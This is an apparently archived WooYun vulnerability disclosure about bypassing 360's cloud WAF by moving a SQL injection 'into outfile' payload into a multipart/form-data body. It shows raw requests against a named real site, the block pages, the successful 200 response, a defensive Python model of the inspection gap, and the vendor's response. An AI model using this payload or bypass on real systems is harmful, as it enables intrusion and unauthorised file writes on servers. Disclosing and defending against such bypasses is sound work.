WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2013-11-28: Details sent to the vendor, awaiting vendor handling
2013-11-29: Vendor has confirmed; details disclosed to the vendor only
2013-12-09: Details disclosed to core white hats and relevant domain experts
2013-12-19: Details disclosed to ordinary white hats
2013-12-29: Details disclosed to intern white hats
2014-01-12: Details disclosed to the public
360网站宝 and similar cloud WAF products have an implementation problem that lets their security policy be bypassed
When handling GET requests these products all recognise the attack, but once the same request is turned into a POST, or into a reworked POST, the detection no longer applies.
GET /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1
Host: www.xiangshu.com
Connection: keep-alive
Content-Length: 1778

HTTP/1.1 493
Server: nginx/1.2.9
Date: Thu, 28 Nov 2013 12:21:35 GMT
Content-Type: text/html
Content-Length: 5538
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn

[Response body: the 360 网站卫士 block page (title "禁止访问", Access Forbidden). Its stylesheet, jQuery, Base64 helper and Google Analytics script are omitted here; the visible text, with the mangled UTF-8 repaired and translated, is:]
Access Forbidden
The request you submitted contains dangerous content and has been intercepted by 网站卫士!
Blocked URL: (filled in by script from location.href)
Block time: (filled in by script)
Result: your IP has been logged and submitted to the network supervision department for the record!
If you are the site owner and want to continue to this URL, please enter the [Webmaster green channel]
(Webmaster green channel: 网站卫士 will automatically add the currently blocked URL to the firewall whitelist, and for 3 hours that URL will not be security-checked. The link sends the browser to http://wangzhan.360.cn/index/shouquan/host/<hostname>/?url=<Base64 of the URL with its query string removed>.)
Switching to
POST /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1
Host: www.xiangshu.com
Connection: keep-alive
Content-Length: 1778

HTTP/1.1 493
Server: nginx/1.2.9
Date: Thu, 28 Nov 2013 12:22:04 GMT
Content-Type: text/html
Content-Length: 5538
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn

[Response body: the same 禁止访问 block page as above.]
Here the plain POST was still blocked (the payload is still in the query string). When that happens, move the request into a file-upload style body (multipart/form-data) instead:
------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7
Content-Disposition: form-data; name="folder"

/blog/
------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7
Content-Disposition: form-data; name="id"

1%20into%20outfile%20'/tmp/abc'
HTTP/1.1 200 OK
Server: nginx/1.2.9
Date: Thu, 28 Nov 2013 12:22:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
X-Powered-By: PHP/5.2.13
Content-Length: 6258

[Response body: the normal www.xiangshu.com homepage (title "橡树摄影网-中国橡树摄影爱好者俱乐部 www.xiangshu.com"), answered by the origin's PHP/5.2.13 backend rather than by the WAF; the page HTML is omitted here.]
and it is not blocked any more......
heh
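What the three captures above show is a WAF that matches its rule against the URL query string (the GET and the POST that kept the payload in the query both got 493) but not against parameters carried in a multipart/form-data body, which reached the origin with a 200. The following Python is an added example and is not code from the original report or from 360's product: it models that gap with a query-only inspector next to a hardened one that extracts and percent-decodes every parameter source (query string, urlencoded body, multipart fields) before applying the same rule, and re-runs the report's transports through both. The path, payload, field names and boundary are copied from the report; the signature list, the 493/200 verdict codes, the multipart Content-Type header, the closing boundary delimiter and the urlencoded-body case are assumptions made for the illustration.

```python
"""
Added example (not from the WooYun report or from 360's product): a model of
the inspection gap described above. inspect_query_only() mimics a WAF that
matches only the URL query string; inspect_all_params() applies the same rule
to every decoded parameter, multipart fields included. Requests are
constructed to mirror the report; the rule set is an assumption.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Verdicts, using the status codes seen in the report's captures (assumption
# that 493 is "blocked" and 200 is "passed to origin").
BLOCK, ALLOW = 493, 200

# Toy rule set; a real WAF carries far more signatures than this (assumption).
SQLI_PATTERNS = [
    re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
]

# Path, payload, boundary and field names as they appear in the report.
PAYLOAD_URL = "/index.php?id=1%20into%20outfile%20'/tmp/abc'"
BOUNDARY = "----------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7"   # body shows "--" + this
MULTIPART_HEADERS = {"Content-Type": f"multipart/form-data; boundary={BOUNDARY}"}
MULTIPART_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="folder"\r\n\r\n'
    "/blog/\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="id"\r\n\r\n'
    "1%20into%20outfile%20'/tmp/abc'\r\n"
    f"--{BOUNDARY}--\r\n"          # closing delimiter: constructed, not in the report
).encode()
FORM_HEADERS = {"Content-Type": "application/x-www-form-urlencoded"}


def is_malicious(value: str) -> bool:
    """Percent-decode (bounded, so double encoding is caught) and match rules."""
    decoded = value
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return any(p.search(decoded) for p in SQLI_PATTERNS)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: raw value} for a multipart/form-data body."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        if part.startswith(b"\r\n"):
            part = part[2:]
        if part.endswith(b"\r\n"):
            part = part[:-2]
        if not part or part == b"--":      # preamble or closing delimiter
            continue
        head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value.decode(errors="replace")
    return fields


def request_params(method: str, url: str, headers: dict, body: bytes) -> dict:
    """Every attacker-controlled parameter, whichever transport carried it."""
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    ctype = headers.get("Content-Type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        params.update(parse_qsl(body.decode(errors="replace"), keep_blank_values=True))
    elif method == "POST" and ctype.startswith("multipart/form-data"):
        m = re.search(r'boundary="?([^";]+)', ctype)
        if m:
            params.update(parse_multipart(body, m.group(1)))
    return params


def inspect_query_only(method, url, headers, body) -> int:
    """What the report observed: only the query string is examined."""
    query = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return BLOCK if any(is_malicious(v) for v in query.values()) else ALLOW


def inspect_all_params(method, url, headers, body) -> int:
    """Hardened: the same rule, applied after decoding every parameter source."""
    params = request_params(method, url, headers, body)
    return BLOCK if any(is_malicious(v) for v in params.values()) else ALLOW


def run_report_cases() -> dict:
    """Verdicts (query-only, all-params) for each transport of the payload."""
    cases = {
        "GET, payload in query": ("GET", PAYLOAD_URL, {}, b""),
        "POST, payload in query": ("POST", PAYLOAD_URL, {}, b""),
        "POST multipart/form-data": ("POST", "/index.php", MULTIPART_HEADERS, MULTIPART_BODY),
        "POST urlencoded body (not in report)": (
            "POST", "/index.php", FORM_HEADERS, b"id=1%20into%20outfile%20'/tmp/abc'"),
    }
    return {name: (inspect_query_only(*r), inspect_all_params(*r)) for name, r in cases.items()}


if __name__ == "__main__":
    for name, (old, new) in run_report_cases().items():
        print(f"{name:40s} query-only={old}  all-params={new}")
```

Two caveats for anyone reproducing this against a real target. The multipart value in the report is still percent-encoded (1%20into%20outfile...), so whether it reaches the SQL layer as "into outfile" depends on the application decoding it, and a WAF has to decode the same way the backend does or it will keep missing it, which is why the hardened inspector decodes before matching. And 493 is what this product returned on block, not a standard HTTP status, so treat it as a fingerprint of the WAF rather than something to rely on.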
Severity: High
Vulnerability Rank: 15
Confirmed: 2013-11-29 17:36
Based on the described bypass method, CNVD carried out sample testing of websites on several domestic website security protection platforms, mainly comparing the bypass effect on dynamic or interactive pages. The results obtained on the different platforms so far are not uniform. Following the handling process, the operators of 360网站卫士, 百度加速乐, 安全宝 and other platforms have already been notified separately. Each party is advised to upgrade its protection rules or perform a targeted technical comparison on this issue; the status will be updated once the parties have responded. Given that the bypass method has to be combined with a specific type of vulnerability to mount an attack, it is for now not recorded as a general vulnerability but only recognised as a risk. rank 15
None yet